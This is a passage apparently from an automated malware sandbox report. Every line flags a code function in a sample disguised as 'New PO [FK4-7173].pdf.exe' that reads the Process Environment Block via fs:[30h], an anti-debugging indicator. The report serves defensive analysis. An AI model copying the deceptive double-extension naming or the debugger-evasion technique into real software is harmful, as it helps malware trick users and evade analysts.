                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B4755 mov eax, dword ptr fs:[00000030h]4_2_011B4755
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116674D mov esi, dword ptr fs:[00000030h]4_2_0116674D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116674D mov eax, dword ptr fs:[00000030h]4_2_0116674D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116674D mov eax, dword ptr fs:[00000030h]4_2_0116674D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01138770 mov eax, dword ptr fs:[00000030h]4_2_01138770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140770 mov eax, dword ptr fs:[00000030h]4_2_01140770
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D678E mov eax, dword ptr fs:[00000030h]4_2_011D678E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011307AF mov eax, dword ptr fs:[00000030h]4_2_011307AF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E47A0 mov eax, dword ptr fs:[00000030h]4_2_011E47A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113C7C0 mov eax, dword ptr fs:[00000030h]4_2_0113C7C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B07C3 mov eax, dword ptr fs:[00000030h]4_2_011B07C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011347FB mov eax, dword ptr fs:[00000030h]4_2_011347FB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011347FB mov eax, dword ptr fs:[00000030h]4_2_011347FB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011527ED mov eax, dword ptr fs:[00000030h]4_2_011527ED
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011527ED mov eax, dword ptr fs:[00000030h]4_2_011527ED
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011527ED mov eax, dword ptr fs:[00000030h]4_2_011527ED
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BE7E1 mov eax, dword ptr fs:[00000030h]4_2_011BE7E1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01172619 mov eax, dword ptr fs:[00000030h]4_2_01172619
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE609 mov eax, dword ptr fs:[00000030h]4_2_011AE609
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114260B mov eax, dword ptr fs:[00000030h]4_2_0114260B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114260B mov eax, dword ptr fs:[00000030h]4_2_0114260B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114260B mov eax, dword ptr fs:[00000030h]4_2_0114260B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114260B mov eax, dword ptr fs:[00000030h]4_2_0114260B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114260B mov eax, dword ptr fs:[00000030h]4_2_0114260B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114260B mov eax, dword ptr fs:[00000030h]4_2_0114260B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114260B mov eax, dword ptr fs:[00000030h]4_2_0114260B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E627 mov eax, dword ptr fs:[00000030h]4_2_0114E627
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01166620 mov eax, dword ptr fs:[00000030h]4_2_01166620
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01168620 mov eax, dword ptr fs:[00000030h]4_2_01168620
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113262C mov eax, dword ptr fs:[00000030h]4_2_0113262C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114C640 mov eax, dword ptr fs:[00000030h]4_2_0114C640
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01162674 mov eax, dword ptr fs:[00000030h]4_2_01162674
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F866E mov eax, dword ptr fs:[00000030h]4_2_011F866E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F866E mov eax, dword ptr fs:[00000030h]4_2_011F866E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A660 mov eax, dword ptr fs:[00000030h]4_2_0116A660
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A660 mov eax, dword ptr fs:[00000030h]4_2_0116A660
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134690 mov eax, dword ptr fs:[00000030h]4_2_01134690
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134690 mov eax, dword ptr fs:[00000030h]4_2_01134690
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011666B0 mov eax, dword ptr fs:[00000030h]4_2_011666B0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C6A6 mov eax, dword ptr fs:[00000030h]4_2_0116C6A6
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0116A6C7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A6C7 mov eax, dword ptr fs:[00000030h]4_2_0116A6C7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE6F2 mov eax, dword ptr fs:[00000030h]4_2_011AE6F2
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE6F2 mov eax, dword ptr fs:[00000030h]4_2_011AE6F2
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE6F2 mov eax, dword ptr fs:[00000030h]4_2_011AE6F2
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE6F2 mov eax, dword ptr fs:[00000030h]4_2_011AE6F2
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B06F1 mov eax, dword ptr fs:[00000030h]4_2_011B06F1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B06F1 mov eax, dword ptr fs:[00000030h]4_2_011B06F1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BC912 mov eax, dword ptr fs:[00000030h]4_2_011BC912
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128918 mov eax, dword ptr fs:[00000030h]4_2_01128918
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128918 mov eax, dword ptr fs:[00000030h]4_2_01128918
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE908 mov eax, dword ptr fs:[00000030h]4_2_011AE908
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AE908 mov eax, dword ptr fs:[00000030h]4_2_011AE908
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B892A mov eax, dword ptr fs:[00000030h]4_2_011B892A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C892B mov eax, dword ptr fs:[00000030h]4_2_011C892B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B0946 mov eax, dword ptr fs:[00000030h]4_2_011B0946
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204940 mov eax, dword ptr fs:[00000030h]4_2_01204940
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D4978 mov eax, dword ptr fs:[00000030h]4_2_011D4978
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D4978 mov eax, dword ptr fs:[00000030h]4_2_011D4978
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BC97C mov eax, dword ptr fs:[00000030h]4_2_011BC97C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01156962 mov eax, dword ptr fs:[00000030h]4_2_01156962
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01156962 mov eax, dword ptr fs:[00000030h]4_2_01156962
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01156962 mov eax, dword ptr fs:[00000030h]4_2_01156962
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0117096E mov eax, dword ptr fs:[00000030h]4_2_0117096E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0117096E mov edx, dword ptr fs:[00000030h]4_2_0117096E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0117096E mov eax, dword ptr fs:[00000030h]4_2_0117096E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B89B3 mov esi, dword ptr fs:[00000030h]4_2_011B89B3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B89B3 mov eax, dword ptr fs:[00000030h]4_2_011B89B3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B89B3 mov eax, dword ptr fs:[00000030h]4_2_011B89B3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011429A0 mov eax, dword ptr fs:[00000030h]4_2_011429A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011309AD mov eax, dword ptr fs:[00000030h]4_2_011309AD
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011309AD mov eax, dword ptr fs:[00000030h]4_2_011309AD
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A9D0 mov eax, dword ptr fs:[00000030h]4_2_0113A9D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A9D0 mov eax, dword ptr fs:[00000030h]4_2_0113A9D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A9D0 mov eax, dword ptr fs:[00000030h]4_2_0113A9D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A9D0 mov eax, dword ptr fs:[00000030h]4_2_0113A9D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A9D0 mov eax, dword ptr fs:[00000030h]4_2_0113A9D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A9D0 mov eax, dword ptr fs:[00000030h]4_2_0113A9D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011649D0 mov eax, dword ptr fs:[00000030h]4_2_011649D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FA9D3 mov eax, dword ptr fs:[00000030h]4_2_011FA9D3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C69C0 mov eax, dword ptr fs:[00000030h]4_2_011C69C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011629F9 mov eax, dword ptr fs:[00000030h]4_2_011629F9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011629F9 mov eax, dword ptr fs:[00000030h]4_2_011629F9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BE9E0 mov eax, dword ptr fs:[00000030h]4_2_011BE9E0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BC810 mov eax, dword ptr fs:[00000030h]4_2_011BC810
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01152835 mov eax, dword ptr fs:[00000030h]4_2_01152835
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01152835 mov eax, dword ptr fs:[00000030h]4_2_01152835
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01152835 mov eax, dword ptr fs:[00000030h]4_2_01152835
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01152835 mov ecx, dword ptr fs:[00000030h]4_2_01152835
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01152835 mov eax, dword ptr fs:[00000030h]4_2_01152835
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01152835 mov eax, dword ptr fs:[00000030h]4_2_01152835
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A830 mov eax, dword ptr fs:[00000030h]4_2_0116A830
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D483A mov eax, dword ptr fs:[00000030h]4_2_011D483A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D483A mov eax, dword ptr fs:[00000030h]4_2_011D483A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01160854 mov eax, dword ptr fs:[00000030h]4_2_01160854
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134859 mov eax, dword ptr fs:[00000030h]4_2_01134859
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134859 mov eax, dword ptr fs:[00000030h]4_2_01134859
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01142840 mov ecx, dword ptr fs:[00000030h]4_2_01142840
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BE872 mov eax, dword ptr fs:[00000030h]4_2_011BE872
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BE872 mov eax, dword ptr fs:[00000030h]4_2_011BE872
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C6870 mov eax, dword ptr fs:[00000030h]4_2_011C6870
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C6870 mov eax, dword ptr fs:[00000030h]4_2_011C6870
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BC89D mov eax, dword ptr fs:[00000030h]4_2_011BC89D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01130887 mov eax, dword ptr fs:[00000030h]4_2_01130887
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E8C0 mov eax, dword ptr fs:[00000030h]4_2_0115E8C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_012008C0 mov eax, dword ptr fs:[00000030h]4_2_012008C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C8F9 mov eax, dword ptr fs:[00000030h]4_2_0116C8F9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116C8F9 mov eax, dword ptr fs:[00000030h]4_2_0116C8F9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FA8E4 mov eax, dword ptr fs:[00000030h]4_2_011FA8E4
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011AEB1D mov eax, dword ptr fs:[00000030h]4_2_011AEB1D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204B00 mov eax, dword ptr fs:[00000030h]4_2_01204B00
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115EB20 mov eax, dword ptr fs:[00000030h]4_2_0115EB20
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115EB20 mov eax, dword ptr fs:[00000030h]4_2_0115EB20
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F8B28 mov eax, dword ptr fs:[00000030h]4_2_011F8B28
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011F8B28 mov eax, dword ptr fs:[00000030h]4_2_011F8B28
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128B50 mov eax, dword ptr fs:[00000030h]4_2_01128B50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DEB50 mov eax, dword ptr fs:[00000030h]4_2_011DEB50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E4B4B mov eax, dword ptr fs:[00000030h]4_2_011E4B4B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E4B4B mov eax, dword ptr fs:[00000030h]4_2_011E4B4B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C6B40 mov eax, dword ptr fs:[00000030h]4_2_011C6B40
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C6B40 mov eax, dword ptr fs:[00000030h]4_2_011C6B40
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FAB40 mov eax, dword ptr fs:[00000030h]4_2_011FAB40
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D8B42 mov eax, dword ptr fs:[00000030h]4_2_011D8B42
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112CB7E mov eax, dword ptr fs:[00000030h]4_2_0112CB7E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01202B57 mov eax, dword ptr fs:[00000030h]4_2_01202B57
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01202B57 mov eax, dword ptr fs:[00000030h]4_2_01202B57
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01202B57 mov eax, dword ptr fs:[00000030h]4_2_01202B57
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01202B57 mov eax, dword ptr fs:[00000030h]4_2_01202B57
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140BBE mov eax, dword ptr fs:[00000030h]4_2_01140BBE
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140BBE mov eax, dword ptr fs:[00000030h]4_2_01140BBE
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E4BB0 mov eax, dword ptr fs:[00000030h]4_2_011E4BB0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E4BB0 mov eax, dword ptr fs:[00000030h]4_2_011E4BB0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DEBD0 mov eax, dword ptr fs:[00000030h]4_2_011DEBD0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01150BCB mov eax, dword ptr fs:[00000030h]4_2_01150BCB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01150BCB mov eax, dword ptr fs:[00000030h]4_2_01150BCB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01150BCB mov eax, dword ptr fs:[00000030h]4_2_01150BCB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01130BCD mov eax, dword ptr fs:[00000030h]4_2_01130BCD
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01130BCD mov eax, dword ptr fs:[00000030h]4_2_01130BCD
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01130BCD mov eax, dword ptr fs:[00000030h]4_2_01130BCD
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01138BF0 mov eax, dword ptr fs:[00000030h]4_2_01138BF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01138BF0 mov eax, dword ptr fs:[00000030h]4_2_01138BF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01138BF0 mov eax, dword ptr fs:[00000030h]4_2_01138BF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115EBFC mov eax, dword ptr fs:[00000030h]4_2_0115EBFC
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BCBF0 mov eax, dword ptr fs:[00000030h]4_2_011BCBF0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011BCA11 mov eax, dword ptr fs:[00000030h]4_2_011BCA11
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01154A35 mov eax, dword ptr fs:[00000030h]4_2_01154A35
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01154A35 mov eax, dword ptr fs:[00000030h]4_2_01154A35
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116CA38 mov eax, dword ptr fs:[00000030h]4_2_0116CA38
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116CA24 mov eax, dword ptr fs:[00000030h]4_2_0116CA24
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115EA2E mov eax, dword ptr fs:[00000030h]4_2_0115EA2E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136A50 mov eax, dword ptr fs:[00000030h]4_2_01136A50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136A50 mov eax, dword ptr fs:[00000030h]4_2_01136A50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136A50 mov eax, dword ptr fs:[00000030h]4_2_01136A50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136A50 mov eax, dword ptr fs:[00000030h]4_2_01136A50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136A50 mov eax, dword ptr fs:[00000030h]4_2_01136A50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136A50 mov eax, dword ptr fs:[00000030h]4_2_01136A50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136A50 mov eax, dword ptr fs:[00000030h]4_2_01136A50
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140A5B mov eax, dword ptr fs:[00000030h]4_2_01140A5B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140A5B mov eax, dword ptr fs:[00000030h]4_2_01140A5B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011ACA72 mov eax, dword ptr fs:[00000030h]4_2_011ACA72
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011ACA72 mov eax, dword ptr fs:[00000030h]4_2_011ACA72
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116CA6F mov eax, dword ptr fs:[00000030h]4_2_0116CA6F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116CA6F mov eax, dword ptr fs:[00000030h]4_2_0116CA6F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116CA6F mov eax, dword ptr fs:[00000030h]4_2_0116CA6F
